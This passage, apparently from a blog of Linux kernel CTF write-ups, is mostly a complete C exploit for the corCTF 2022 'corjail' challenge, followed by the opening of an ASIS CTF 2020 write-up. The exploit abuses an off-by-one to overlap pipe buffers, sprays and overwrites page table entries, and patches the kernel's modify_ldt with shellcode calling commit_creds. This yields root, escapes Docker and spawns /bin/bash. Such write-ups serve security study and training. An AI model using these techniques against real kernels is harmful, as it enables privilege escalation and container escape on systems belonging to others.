kbase == 0x252f0 sub r15, 5; // call get_rip; takes 5 bytes // call commit_creds(&amp;init_cred); lea rdi, [r15 + 0x145a960]; // &amp;init_cred - kbase == 0x145a960 lea rax, [r15 + 0xeba40]; // &amp;commit_creds - kbase == 0xeba40 call rax; // task = find_task_by_vpid(1); // call switch_task_namespaces(task, &amp;init_nsproxy); mov rdi, 1; lea rax, [r15 + 0xe4fc0]; // &amp;find_task_by_vpid - kbase == 0xe4fc0 call rax; // find_task_by_vpid(1) mov rdi, rax; // task lea rsi, [r15 + 0x145a720]; // &amp;init_nsproxy - kbase == 0x145a720 lea rax, [r15 + 0xea4e0]; // &amp;switch_task_namespaces - kbase == 0xea4e0 call rax; // switch_task_namespaces(task, &amp;init_nsproxy); // current = find_task_by_vpid(pid); // current-&gt;fs = copy_fs_struct(&amp;init_fs); lea rdi, [r15 + 0x1589740]; // &amp;init_fs - kbase == 0x1589740 lea rax, [r15 + 0x2e7350]; // &amp;copy_fs_struct - kbase == 0x2e7350 call rax; // copy_fs_struct(&amp;init_fs); mov rbx, rax; // new_fs mov rdi, 0x1111111111111111; // pid: will be fiexed lea rax, [r15 + 0xe4fc0]; // &amp;find_task_by_vpid - kbase == 0xe4fc0 call rax; // current = find_task_by_vpid(pid) mov [rax + 0x6e0], rbx; // current-&gt;fs = new_fs // bypass kpti xor rax, rax; mov [rsp + 0x00], rax; mov [rsp + 0x08], rax; mov rax, 0x2222222222222222; // user_ip: will be fixed mov [rsp + 0x10], rax; mov rax, 0x3333333333333333; // user_cs: will be fixed mov [rsp + 0x18], rax; mov rax, 0x4444444444444444; // user_rflags: will be fixed mov [rsp + 0x20], rax; mov rax, 0x5555555555555555; // user_sp: will be fixed mov [rsp + 0x28], rax; mov rax, 0x6666666666666666; // user_ss: will be fixed mov [rsp + 0x30], rax; lea rax, [r15 + 0xc00f06]; // bypass_kpti - kbase == 0xc00f06; bypass_kpti is in swapgs_restore_regs_and_return_to_usermode jmp rax; // bypass_kpti</code></pre></div> <h2 id="exploit-code">Exploit code</h2> <div class="collapsable-code"> <input id="184976253" type="checkbox" checked /> <label for="184976253"> <span class="collapsable-code__language">c</span> <span class="collapsable-code__title">corCTF2022-corjail-exploit.c</span> <span class="collapsable-code__toggle" data-label-expand="Show" data-label-collapse="Hide"></span> </label> <pre class="language-c" > <code>#define _GNU_SOURCE #include &lt;fcntl.h&gt; #include &lt;linux/keyctl.h&gt; #include &lt;poll.h&gt; #include &lt;pthread.h&gt; #include &lt;sched.h&gt; #include &lt;stdarg.h&gt; #include &lt;stdint.h&gt; #include &lt;stdio.h&gt; #include &lt;stdlib.h&gt; #include &lt;string.h&gt; #include &lt;sys/mman.h&gt; #include &lt;sys/syscall.h&gt; #include &lt;sys/wait.h&gt; #include &lt;syscall.h&gt; #include &lt;unistd.h&gt; #define KERNEL_BASE_START 0xffffffff81000000 #define KERNEL_BASE_END 0xffffffffc0000000 #define KERNEL_BASE_MASK (~0x00000000000fffff) #define IS_IN_KERNEL_RANGE(addr) \ ((addr) &gt;= KERNEL_BASE_START &amp;&amp; (addr) &lt; KERNEL_BASE_END) #define _PAGE_PRESENT (1ULL &lt;&lt; 0) // Page is present in memory #define _PAGE_RW (1ULL &lt;&lt; 1) // Read/Write permission (1: writable) #define _PAGE_USER (1ULL &lt;&lt; 2) // User/Supervisor mode (1: user-accessible) #define _PAGE_PWT (1ULL &lt;&lt; 3) // Page Write-Through (1: write-through enabled) #define _PAGE_PCD (1ULL &lt;&lt; 4) // Page Cache Disable (1: caching disabled) #define _PAGE_ACCESSED (1ULL &lt;&lt; 5) // Accessed bit (1: page has been accessed) #define _PAGE_DIRTY (1ULL &lt;&lt; 6) // Dirty bit (1: page has been modified) #define _PAGE_PSE \ (1ULL &lt;&lt; 7) // Page Size Extension (1: 2MB/1GB page, 0: 4KB page) #define _PAGE_GLOBAL \ (1ULL &lt;&lt; 8) // Global page (1: remains in TLB across context switches) #define _PAGE_NX (1ULL &lt;&lt; 63) // No-Execute bit (1: execution is prohibited) #define PTE_FLAGS_MASK \ 0xFFF0000000000FFFULL // Mask to extract the lower 12-bit flag field #define PTE_PFN_MASK \ (~PTE_FLAGS_MASK) // Mask to extract the PFN (Page Frame Number) // Macro to extract the PFN from a PTE #define PTE_TO_PFN(pte) (((pte) &amp; PTE_PFN_MASK) &gt;&gt; PAGE_SHIFT) #define PAGE_DEFAULT_FLAGS \ (_PAGE_PRESENT | _PAGE_RW | _PAGE_USER | _PAGE_ACCESSED) // Cache utils from https://github.com/isec-tugraz/SLUBStick #ifndef HIDEMINMAX #define MAX(X, Y) (((X) &gt; (Y)) ? (X) : (Y)) #define MIN(X, Y) (((X) &lt; (Y)) ? (X) : (Y)) #endif static size_t rdtsc(void); static inline size_t rdtsc_nofence(void) { return rdtsc(); size_t a, d; asm volatile(&#34;rdtsc&#34; : &#34;=a&#34;(a), &#34;=d&#34;(d)); a = (d &lt;&lt; 32) | a; return a; } static inline size_t rdtsc(void) { size_t a, d; asm volatile(&#34;mfence&#34;); asm volatile(&#34;rdtsc&#34; : &#34;=a&#34;(a), &#34;=d&#34;(d)); a = (d &lt;&lt; 32) | a; asm volatile(&#34;mfence&#34;); return a; } static inline size_t rdtsc_begin(void) { size_t a, d; asm volatile(&#34;mfence&#34;); asm volatile(&#34;rdtsc&#34; : &#34;=a&#34;(a), &#34;=d&#34;(d)); a = (d &lt;&lt; 32) | a; asm volatile(&#34;lfence&#34;); return a; } static inline size_t rdtsc_end(void) { size_t a, d; asm volatile(&#34;lfence&#34;); asm volatile(&#34;rdtsc&#34; : &#34;=a&#34;(a), &#34;=d&#34;(d)); a = (d &lt;&lt; 32) | a; asm volatile(&#34;mfence&#34;); return a; } void pin_to_core(size_t core); static void get_enter_to_continue(const char *msg); static void fatal(const char *msg); void pin_to_core(size_t core) { cpu_set_t target_cpu; CPU_ZERO(&amp;target_cpu); CPU_SET(core, &amp;target_cpu); if (sched_setaffinity(0, sizeof(cpu_set_t), &amp;target_cpu)) { fatal(&#34;sched_setaffinity&#34;); } } static void get_enter_to_continue(const char *msg) { puts(msg); getchar(); } static void fatal(const char *msg) { perror(msg); // get_enter_to_continue(&#34;Press enter to exit...&#34;); exit(-1); } /** * type must be &#34;keyring&#34;, &#34;user&#34;, &#34;logon&#34;, or &#34;big_key&#34; */ static int32_t sys_add_key(const char *type, const char *desc, const void *payload, size_t plen, int ringid); static int32_t sys_keyctl(int cmd, ...); static int32_t sys_revoke_key(int32_t key); static int32_t sys_update_key(int32_t key, void *payload, size_t size); static int32_t sys_read_key(int32_t key, char *buf, size_t size); static int32_t sys_add_key(const char *type, const char *desc, const void *payload, size_t plen, int ringid) { return syscall(__NR_add_key, type, desc, payload, plen, ringid); } static int32_t sys_keyctl(int cmd, ...) { va_list ap; long arg2, arg3, arg4, arg5; va_start(ap, cmd); arg2 = va_arg(ap, long); arg3 = va_arg(ap, long); arg4 = va_arg(ap, long); arg5 = va_arg(ap, long); va_end(ap); return syscall(__NR_keyctl, cmd, arg2, arg3, arg4, arg5); } static int32_t sys_revoke_key(int32_t key) { return sys_keyctl(KEYCTL_REVOKE, key); } static int32_t sys_read_key(int32_t key, char *buf, size_t size) { return sys_keyctl(KEYCTL_READ, key, buf, size); } static int32_t sys_update_key(int32_t key, void *payload, size_t size) { return sys_keyctl(KEYCTL_UPDATE, key, payload, size); } int vuln_fd; static void off_by_one_in_kmalloc_4k(void); static void off_by_one_in_kmalloc_4k(void) { char buf[0x1000]; memset(buf, 0, 0x1000); write(vuln_fd, buf, 0x1000); } #define HEAP_ALLOC_COUNT 1000 int pipe_fds[HEAP_ALLOC_COUNT][2]; int alloc_4k_pipe_at(uint64_t idx) { const size_t pipe_size = 0x1000 * 64; int *fds = pipe_fds[idx]; int res = pipe(fds); res |= (fcntl(fds[1], F_SETPIPE_SZ, pipe_size) &lt; 0); char *uniguri = &#34;UNIGURI@&#34;; const uint64_t pipe_magic = 0xdeadbeef00000000 + idx; write(fds[1], uniguri, 8); write(fds[1], &amp;pipe_magic, 8); return !res ? 0 : -1; } void close_pipe_at(size_t idx) { for (int i = 0; i &lt; 2; ++i) { if (pipe_fds[idx][i] &gt; 2) { close(pipe_fds[idx][i]); pipe_fds[idx][i] = -1; } } } size_t last_idx_in_slab[HEAP_ALLOC_COUNT]; int pipe_cnt = 0; int make_kmalloc_4k_slab_full(const int slab_cnt) { pipe_cnt = 0; int add_key_res[HEAP_ALLOC_COUNT]; size_t times[HEAP_ALLOC_COUNT] = { 0, }; const char type[] = &#34;keyring&#34;; char desc[0x1000]; memset(desc, &#39;.&#39;, sizeof(desc)); desc[sizeof(desc) - 1] = 0; size_t last = 0; memset(last_idx_in_slab, 0, sizeof(last_idx_in_slab)); size_t running = 0; int finded = 0; for (int i = 0; i &lt; HEAP_ALLOC_COUNT; ++i) { sched_yield(); int pipe_res = alloc_4k_pipe_at(i); const size_t t1 = rdtsc_begin(); sys_add_key(type, desc, NULL, 0, 0); const size_t t2 = rdtsc_end(); times[i] = t2 - t1; if (pipe_res &lt; 0) { break; } ++pipe_cnt; if (times[i] &gt; 8000 &amp;&amp; (i == 0 || times[i] - times[i - 1] &gt; 1500)) { if (last == 0) { last = i; last_idx_in_slab[running] = i; ++running; } else if (i - last == 8) { last = i; last_idx_in_slab[running] = i; ++running; } else { last = 0; running = 0; } if (running == slab_cnt) { for (int j = 0; j &lt; 8 &amp;&amp; (i + j + 1 - last) % 8 != 0; ++j) { alloc_4k_pipe_at(i + j + 1); ++pipe_cnt; } finded = 1; break; } } } return finded ? 0 : -1; } size_t victim_pipe_fds[2]; int find_overlapped_pipes() { char buf[0x20]; uint64_t *uint64_buf = (uint64_t *)buf; for (size_t i = 0; i &lt; pipe_cnt; ++i) { read(pipe_fds[i][0], buf, 0x10); int is_ok = (memcmp(buf, &#34;UNIGURI@&#34;, 8) == 0 &amp;&amp; (uint64_buf[1] &gt;&gt; 32) == 0xdeadbeef); int is_corrupted = (uint64_buf[1] == 0xdeadbeef00000000 + i); if (is_ok &amp;&amp; !is_corrupted) { victim_pipe_fds[0] = i; victim_pipe_fds[1] = uint64_buf[1] &amp; 0xffffffff; return 0; } if (!is_ok) { return -1; } } return -1; } int test_overlapped_pipes() { char tmp[0x100]; memset(tmp, 0, sizeof(tmp)); const char *test_str = &#34;UNIGURI!&#34;; const size_t test_str_len = strlen(test_str); printf(&#34; [*] Test msg(len=0x%lx): \&#34;%s\&#34;\n&#34;, test_str_len, test_str); write(pipe_fds[victim_pipe_fds[1]][1], tmp, test_str_len); strncpy(tmp, test_str, sizeof(tmp)); printf(&#34; [*] Write \&#34;%s\&#34; to pipe@%lx\n&#34;, tmp, victim_pipe_fds[0]); write(pipe_fds[victim_pipe_fds[0]][1], tmp, test_str_len); memset(tmp, 0, sizeof(tmp)); read(pipe_fds[victim_pipe_fds[1]][0], tmp, test_str_len); printf(&#34; [*] Read \&#34;%s\&#34; from pipe@%lx\n&#34;, tmp, victim_pipe_fds[1]); const int successed = !memcmp(test_str, tmp, test_str_len) ? 0 : -1; read(pipe_fds[victim_pipe_fds[0]][0], tmp, test_str_len); return successed; } #define MMAP_SPRAY_COUNT 0x1000UL #define FILE_SPRAY_COUNT (MMAP_SPRAY_COUNT / 0x10) void *mmap_addrs[MMAP_SPRAY_COUNT]; #define MMAP_SPRAT_START_ADDR 0xcafe0000UL #define MMAP_PAGE_SIZE 0x1000UL #define MMAP_SPRAT_STEP 0x10000UL #define MMAP_SPRAT_SIZE 0x10000UL void spray_ptes_target_to_victim_pipe_page() { for (int i = 0; i &lt; MMAP_SPRAY_COUNT; ++i) { mmap_addrs[i] = mmap((void *)(MMAP_SPRAT_START_ADDR + i * MMAP_SPRAT_STEP), MMAP_SPRAT_SIZE, PROT_READ | PROT_WRITE, MAP_ANONYMOUS | MAP_SHARED, -1, 0); if (mmap_addrs[i] == MAP_FAILED) { fatal(&#34;mmap&#34;); } } int file_fds[FILE_SPRAY_COUNT]; sched_yield(); close_pipe_at(victim_pipe_fds[1]); for (int i = 0; i &lt; FILE_SPRAY_COUNT; ++i) { file_fds[i] = open(&#34;/&#34;, O_RDONLY); if (file_fds[i] &lt; 0) { fatal(&#34;open&#34;); } } for (int i = 0; i &lt; FILE_SPRAY_COUNT; ++i) { close(file_fds[i]); } for (int i = 0; i &lt; MMAP_SPRAY_COUNT; ++i) { for (int j = 0; j &lt; MMAP_SPRAT_SIZE / MMAP_PAGE_SIZE; ++j) { uint64_t *addr = (uint64_t *)(mmap_addrs[i] + MMAP_PAGE_SIZE * j); const uint64_t val = ((uint64_t)i &lt;&lt; 32) + j * 0x01010101; *addr = val; } } } void *corrupted_mmap_addr = (void *)-1; void find_corrupted_mmap_addr() { if (corrupted_mmap_addr != (void *)-1) { return; } for (int i = 0; i &lt; MMAP_SPRAY_COUNT; ++i) { for (int j = 0; j &lt; MMAP_SPRAT_SIZE / MMAP_PAGE_SIZE; ++j) { uint64_t *addr = (uint64_t *)(mmap_addrs[i] + MMAP_PAGE_SIZE * j); const uint64_t val = ((uint64_t)i &lt;&lt; 32) + j * 0x01010101; if (*addr != val) { corrupted_mmap_addr = addr; return; } } } } uint64_t original_ptes[0x1000 / 8]; uint64_t physical_kernel_base; uint64_t default_pte_for_kernel_code; void *set_pte(uint64_t new_pte) { static uint64_t cur_offset = 0; if (cur_offset &gt;= 0x1000 * 512) { fatal(&#34;set_pte: too many modifications&#34;); } write(pipe_fds[victim_pipe_fds[0]][1], &amp;new_pte, 8); if (corrupted_mmap_addr == (void *)-1) { find_corrupted_mmap_addr(); } void *affected_addr = corrupted_mmap_addr + cur_offset; cur_offset += 0x1000; return affected_addr; } uint64_t user_cs, user_ss, user_sp, user_rflags; static void save_state() { asm(&#34;mov %[u_cs], cs;\n&#34; &#34;mov %[u_ss], ss;\n&#34; &#34;mov %[u_sp], rsp;\n&#34; &#34;pushf;\n&#34; &#34;pop %[u_rflags];\n&#34; : [u_cs] &#34;=r&#34;(user_cs), [u_ss] &#34;=r&#34;(user_ss), [u_sp] &#34;=r&#34;(user_sp), [u_rflags] &#34;=r&#34;(user_rflags)::&#34;memory&#34;); printf( &#34;[*] user_cs: 0x%lx, user_ss: 0x%lx, user_sp: 0x%lx, user_rflags: &#34; &#34;0x%lx\n&#34;, user_cs, user_ss, user_sp, user_rflags); } #define MODIFY_LDT_ADDR 0xffffffff810252f0 #define MODIFY_LDT_OFFSET (MODIFY_LDT_ADDR - KERNEL_BASE_START) uint64_t *modify_ldt_addr; uint8_t original_modify_ldt_code[0x1000]; static void get_shell() { puts(&#34;[+] Escaping docker is success&#34;); puts(&#34; [*] Restore original modify_ldt code&#34;); memcpy(modify_ldt_addr, original_modify_ldt_code, sizeof(original_modify_ldt_code) - (MODIFY_LDT_OFFSET &amp; 0xfff)); puts(&#34;[+] Get shell!&#34;); char *argv[] = {&#34;/bin/bash&#34;, NULL}; char *envp[] = {NULL}; execve(&#34;/bin/bash&#34;, argv, envp); } void patch_modify_ldt() { const uint64_t pte_for_modify_ldt = default_pte_for_kernel_code + (MODIFY_LDT_OFFSET &amp; ~(0xFFF)); modify_ldt_addr = (uint64_t *)(set_pte(pte_for_modify_ldt) + (MODIFY_LDT_OFFSET &amp; 0xfff)); /* * Below opcodes are from: * call get_rip; * get_rip: * pop r15; * sub r15, 0x252f0; // &amp;__x64_sys_modify_ldt - kbase == 0x252f0 * sub r15, 5; // call get_rip; takes 5 bytes * * // call commit_creds(&amp;init_cred); * lea rdi, [r15 + 0x145a960]; // &amp;init_cred - kbase == 0x145a960 * lea rax, [r15 + 0xeba40]; // &amp;commit_creds - kbase == 0xeba40 * call rax; * * // task = find_task_by_vpid(1); * // call switch_task_namespaces(task, &amp;init_nsproxy); * mov rdi, 1; * lea rax, [r15 + 0xe4fc0]; // &amp;find_task_by_vpid - kbase == 0xe4fc0 * call rax; // find_task_by_vpid(1) * mov rdi, rax; // task * lea rsi, [r15 + 0x145a720]; // &amp;init_nsproxy - kbase == 0x145a720 * lea rax, [r15 + 0xea4e0]; // &amp;switch_task_namespaces - kbase == 0xea4e0 * call rax; // switch_task_namespaces(task, &amp;init_nsproxy); * * // current = find_task_by_vpid(pid); * // current-&gt;fs = copy_fs_struct(&amp;init_fs); * lea rdi, [r15 + 0x1589740]; // &amp;init_fs - kbase == 0x1589740 * lea rax, [r15 + 0x2e7350]; // &amp;copy_fs_struct - kbase == 0x2e7350 * call rax; // copy_fs_struct(&amp;init_fs); * mov rbx, rax; // new_fs * mov rdi, 0x1111111111111111; // pid: will be fiexed * lea rax, [r15 + 0xe4fc0]; // &amp;find_task_by_vpid - kbase == 0xe4fc0 * call rax; // current = find_task_by_vpid(pid) * mov [rax + 0x6e0], rbx; // current-&gt;fs = new_fs * * // bypass kpti * xor rax, rax; * mov [rsp + 0x00], rax; * mov [rsp + 0x08], rax; * mov rax, 0x2222222222222222; // user_ip: will be fixed * mov [rsp + 0x10], rax; * mov rax, 0x3333333333333333; // user_cs: will be fixed * mov [rsp + 0x18], rax; * mov rax, 0x4444444444444444; // user_rflags: will be fixed * mov [rsp + 0x20], rax; * mov rax, 0x5555555555555555; // user_sp: will be fixed * mov [rsp + 0x28], rax; * mov rax, 0x6666666666666666; // user_ss: will be fixed * mov [rsp + 0x30], rax; * lea rax, [r15 + 0xc00f06]; // bypass_kpti - kbase == 0xc00f06 * jmp rax; // bypass_kpti */ uint8_t new_modify_ldt_code[] = { 0xE8, 0x00, 0x00, 0x00, 0x00, 0x41, 0x5F, 0x49, 0x81, 0xEF, 0xF0, 0x52, 0x02, 0x00, 0x49, 0x83, 0xEF, 0x05, 0x49, 0x8D, 0xBF, 0x60, 0xA9, 0x45, 0x01, 0x49, 0x8D, 0x87, 0x40, 0xBA, 0x0E, 0x00, 0xFF, 0xD0, 0x48, 0xC7, 0xC7, 0x01, 0x00, 0x00, 0x00, 0x49, 0x8D, 0x87, 0xC0, 0x4F, 0x0E, 0x00, 0xFF, 0xD0, 0x48, 0x89, 0xC7, 0x49, 0x8D, 0xB7, 0x20, 0xA7, 0x45, 0x01, 0x49, 0x8D, 0x87, 0xE0, 0xA4, 0x0E, 0x00, 0xFF, 0xD0, 0x49, 0x8D, 0xBF, 0x40, 0x97, 0x58, 0x01, 0x49, 0x8D, 0x87, 0x50, 0x73, 0x2E, 0x00, 0xFF, 0xD0, 0x48, 0x89, 0xC3, 0x48, 0xBF, 0x11, 0x11, 0x11, 0x11, 0x11, 0x11, 0x11, 0x11, 0x49, 0x8D, 0x87, 0xC0, 0x4F, 0x0E, 0x00, 0xFF, 0xD0, 0x48, 0x89, 0x98, 0xE0, 0x06, 0x00, 0x00, 0x48, 0x31, 0xC0, 0x48, 0x89, 0x04, 0x24, 0x48, 0x89, 0x44, 0x24, 0x08, 0x48, 0xB8, 0x22, 0x22, 0x22, 0x22, 0x22, 0x22, 0x22, 0x22, 0x48, 0x89, 0x44, 0x24, 0x10, 0x48, 0xB8, 0x33, 0x33, 0x33, 0x33, 0x33, 0x33, 0x33, 0x33, 0x48, 0x89, 0x44, 0x24, 0x18, 0x48, 0xB8, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x48, 0x89, 0x44, 0x24, 0x20, 0x48, 0xB8, 0x55, 0x55, 0x55, 0x55, 0x55, 0x55, 0x55, 0x55, 0x48, 0x89, 0x44, 0x24, 0x28, 0x48, 0xB8, 0x66, 0x66, 0x66, 0x66, 0x66, 0x66, 0x66, 0x66, 0x48, 0x89, 0x44, 0x24, 0x30, 0x49, 0x8D, 0x87, 0x06, 0x0F, 0xC0, 0x00, 0xFF, 0xE0}; uint64_t *ptr; ptr = (uint64_t *)memmem(new_modify_ldt_code, sizeof(new_modify_ldt_code), &#34;\x11\x11\x11\x11\x11\x11\x11\x11&#34;, 8); *ptr = getpid(); ptr = (uint64_t *)memmem(new_modify_ldt_code, sizeof(new_modify_ldt_code), &#34;\x22\x22\x22\x22\x22\x22\x22\x22&#34;, 8); *ptr = (uint64_t)get_shell; ptr = (uint64_t *)memmem(new_modify_ldt_code, sizeof(new_modify_ldt_code), &#34;\x33\x33\x33\x33\x33\x33\x33\x33&#34;, 8); *ptr = user_cs; ptr = (uint64_t *)memmem(new_modify_ldt_code, sizeof(new_modify_ldt_code), &#34;\x44\x44\x44\x44\x44\x44\x44\x44&#34;, 8); *ptr = user_rflags; ptr = (uint64_t *)memmem(new_modify_ldt_code, sizeof(new_modify_ldt_code), &#34;\x55\x55\x55\x55\x55\x55\x55\x55&#34;, 8); *ptr = user_sp; ptr = (uint64_t *)memmem(new_modify_ldt_code, sizeof(new_modify_ldt_code), &#34;\x66\x66\x66\x66\x66\x66\x66\x66&#34;, 8); *ptr = user_ss; memcpy(original_modify_ldt_code, modify_ldt_addr, sizeof(original_modify_ldt_code) - (MODIFY_LDT_OFFSET &amp; 0xfff)); memcpy(modify_ldt_addr, new_modify_ldt_code, sizeof(new_modify_ldt_code)); } #define SLAB_COUNT 7 int main() { pin_to_core(0); save_state(); vuln_fd = open(&#34;/proc_rw/cormon&#34;, O_RDWR); if (vuln_fd &lt; 0) { fatal(&#34;open&#34;); } void *tmpbuf = malloc(0x1000); uint64_t *uint64_tmpbuf = (uint64_t *)tmpbuf; FIRST_STEP: #define RETRY() \ do { \ for (int i = 0; i &lt; pipe_cnt; ++i) { \ close_pipe_at(i); \ } \ sched_yield(); \ puts(&#34;\n[*] Retry from first step after 1 seconds\n&#34;); \ sleep(1); \ goto FIRST_STEP; \ } while (0) puts(&#34;[*] Do side-channel for kmalloc-4k slab...&#34;); while (make_kmalloc_4k_slab_full(SLAB_COUNT) &lt; 0) { puts(&#34; [*] Retry side-channel for kmalloc-4k slab...&#34;); for (int i = 0; i &lt; pipe_cnt; ++i) { close_pipe_at(i); } sched_yield(); } puts(&#34; [+] Side-channel success&#34;); const size_t target_pipe_idx = SLAB_COUNT * 4 + 4; puts(&#34;[*] Trigger off-by-one...&#34;); sched_yield(); close_pipe_at(target_pipe_idx); off_by_one_in_kmalloc_4k(); alloc_4k_pipe_at(target_pipe_idx); sched_yield(); puts(&#34;[*] Finding overlapped pipes...&#34;); if (find_overlapped_pipes()) { puts(&#34; [-] Overlapping seems false positive&#34;); RETRY(); } printf(&#34; [+] pipe @ %lx and pipe @ %lx are overlapped!\n&#34;, victim_pipe_fds[0], victim_pipe_fds[1]); puts(&#34;[*] Test overlapped pipes&#34;); if (test_overlapped_pipes() &lt; 0) { puts(&#34; [-] Overlapping seems false positive&#34;); RETRY(); } puts(&#34; [+] Overlapping is true&#34;); puts(&#34;[*] Set pipe&#39;s offset to 0x1000 for reading PTEs&#34;); write(pipe_fds[victim_pipe_fds[0]][1], original_ptes, 0x1000); puts(&#34;[*] Spray PTEs...&#34;); spray_ptes_target_to_victim_pipe_page(); puts(&#34;[*] Read PTEs&#34;); read(pipe_fds[victim_pipe_fds[0]][0], original_ptes, 0x1000); if ((original_ptes[0] &amp; PTE_FLAGS_MASK) != 0x8000000000000867) { puts(&#34; [-] UAF page does not contain PTEs&#34;); RETRY(); } printf(&#34; [+] UAF page contains PTEs (One of them is 0x%016lx)\n&#34;, original_ptes[0]); puts(&#34;[*] Overwrite PTE to leak physical kernel base&#34;); const uint64_t new_pte_for_dmabuf = PAGE_DEFAULT_FLAGS | 0x9c000; // dmabuf..? WTF?! uint64_t *dmabuf_addr = (uint64_t *)set_pte(new_pte_for_dmabuf); find_corrupted_mmap_addr(); if (corrupted_mmap_addr == (void *)-1) { puts(&#34; [-] Corrupted mmap addr not found&#34;); RETRY(); } printf(&#34; [+] Corrupted mmap addr: %p\n&#34;, corrupted_mmap_addr); physical_kernel_base = (*dmabuf_addr &amp; PTE_PFN_MASK) - 0x2004000ULL; printf(&#34; [+] physical kernel base: 0x%016lx\n&#34;, physical_kernel_base); default_pte_for_kernel_code = physical_kernel_base | PAGE_DEFAULT_FLAGS; puts(&#34;[*] Escaping docker...&#34;); puts(&#34; [*] Patch modify_ldt&#34;); patch_modify_ldt(); puts(&#34; [*] Call patched modify_ldt...&#34;); syscall(SYS_modify_ldt); puts(&#34; [-] Failed to Escaping docker&#34;); get_enter_to_continue(&#34;Press enter to exit...&#34;); return 0; }</code></pre></div> <h2 id="reference">Reference</h2> <ul> <li><a href="https://github.com/Crusaders-of-Rust/corCTF-2022-public-challenge-archive/tree/master/pwn/corjail/task">https://github.com/Crusaders-of-Rust/corCTF-2022-public-challenge-archive/tree/master/pwn/corjail/task</a></li> <li><a href="https://gitlab.com/sajjadium/ctf-archives/-/tree/main/ctfs/corCTF/2022/pwn/CoRJail">https://gitlab.com/sajjadium/ctf-archives/-/tree/main/ctfs/corCTF/2022/pwn/CoRJail</a></li> <li><a href="https://github.com/isec-tugraz/SLUBStick">https://github.com/isec-tugraz/SLUBStick</a></li> <li><a href="https://github.com/Lotuhu/Page-UAF">https://github.com/Lotuhu/Page-UAF</a></li> <li><a href="https://ptr-yudai.hatenablog.com/entry/2023/12/07/221333">https://ptr-yudai.hatenablog.com/entry/2023/12/07/221333</a></li> </ul> /posts/kernel/write-ups/ctf/asisctf2020qual-shared_house/ Thu, 27 Feb 2025 12:17:57 +0000 /posts/kernel/write-ups/ctf/asisctf2020qual-shared_house/ <hr> <h2 id="problem">Problem</h2> <h3 id="enviroment">Enviroment</h3> <ul> <li>linux version: <a href="https://elixir.bootlin.com/linux/v4.19.98/source"><code>4.19.98</code></a> <ul> <li>No SMAP</li> <li>No KPTI</li> </ul> </li> </ul> <h3 id="features">Features</h3> <p>This challenge provide simple device (it has only one function: <code>mod_ioctl</code>). And the function is like following:</p> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-c" data-lang="c"><span style="display:flex;"><span><span style="color:#66d9ef">struct</span> <span style="color:#66d9ef">request_t</span> </span></span><span style="display:flex;"><span>{ </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">unsigned</span> <span style="color:#66d9ef">int</span> size; </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">char</span> __padding0[<span style="color:#ae81ff">4</span>]; </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">void</span> <span style="color:#f92672">*</span>data; </span></span><span style="display:flex;"><span>}; </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span>uint64_6 <span style="color:#a6e22e">mod_ioctl</span>(<span style="color:#66d9ef">struct</span> file <span style="color:#f92672">*</span>a1, <span style="color:#66d9ef">unsigned</span> <span style="color:#66d9ef">int</span> cmd, <span style="color:#66d9ef">unsigned</span> <span style="color:#66d9ef">__int64</span> arg) { </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">struct</span> <span style="color:#66d9ef">request_t</span> req; </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">if</span> (<span style="color:#a6e22e">copy_from_user</span>(<span style="color:#f92672">&amp;</span>req, arg, <span style="color:#ae81ff">0x10LL</span>)) <span style="color:#66d9ef">return</span> <span style="color:#f92672">-</span><span style="color:#ae81ff">14LL</span>; </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">if</span> (req.size <span style="color:#f92672">&gt;</span> <span style="color:#ae81ff">0x80</span>) <span style="color:#66d9ef">return</span> <span style="color:#f92672">-</span><span style="color:#ae81ff">22LL</span>; </span></span><span style="display:flex;"><span> <span style="color:#a6e22e">mutex_lock</span>(<span style="color:#f92672">&amp;</span>_mutex); </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">if</span> (cmd <span style="color:#f92672">==</span> <span style="color:#ae81ff">0xC12ED002</span>) { <span style="color:#75715e">// cmd == 0xC12ED002: delete_note </span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span> <span style="color:#66d9ef">if</span> (<span style="color:#f92672">!</span>note) { </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">goto</span> ERROR; </span></span><span style="display:flex;"><span> } </span></span><span style="display:flex;"><span> <span style="color:#a6e22e">kfree</span>(note); </span></span><span style="display:flex;"><span> note <span style="color:#f92672">=</span> <span style="color:#ae81ff">0LL</span>; </span></span><span style="display:flex;"><span> } <span style="color:#66d9ef">else</span> <span style="color:#66d9ef">if</span> (cmd <span style="color:#f92672">==</span> <span style="color:#ae81ff">0xC12ED001</span>) { <span style="color:#75715e">// cmd == 0xC12ED001: alloc_new_note </span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span> <span style="color:#66d9ef">if</span> (note) <span style="color:#a6e22e">kfree</span>(note); </span></span><span style="display:flex;"><span> size <span style="color:#f92672">=</span> req.size; </span></span><span style="display:flex;"><span> note <span style="color:#f92672">=</span> (<span style="color:#66d9ef">char</span> <span style="color:#f92672">*</span>)<span style="color:#a6e22e">_kmalloc</span>(req.size, <span style="color:#ae81ff">0x6080C0LL</span>); </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">if</span> (<span style="color:#f92672">!</span>note) <span style="color:#66d9ef">goto</span> ERROR; </span></span><span style="display:flex;"><span> } <span style="color:#66d9ef">else</span> <span style="color:#66d9ef">if</span> (cmd <span style="color:#f92672">==</span> <span style="color:#ae81ff">0xC12ED003</span>) { <span style="color:#75715e">// cmd == 0xC12ED003: write_note </span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span> <span style="color:#66d9ef">if</span> (<span style="color:#f92672">!</span>note <span style="color:#f92672">||</span> req.size <span style="color:#f92672">&gt;</span> size <span style="color:#f92672">||</span> <span style="color:#a6e22e">copy_from_user</span>(note, req.data, req.size)) </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">goto</span> ERROR; </span></span><span style="display:flex;"><span> note[req.size] <span style="color:#f92672">=</span> <span style="color:#ae81ff">0</span>; <span style="color:#75715e">// off-by-one if req.size==size 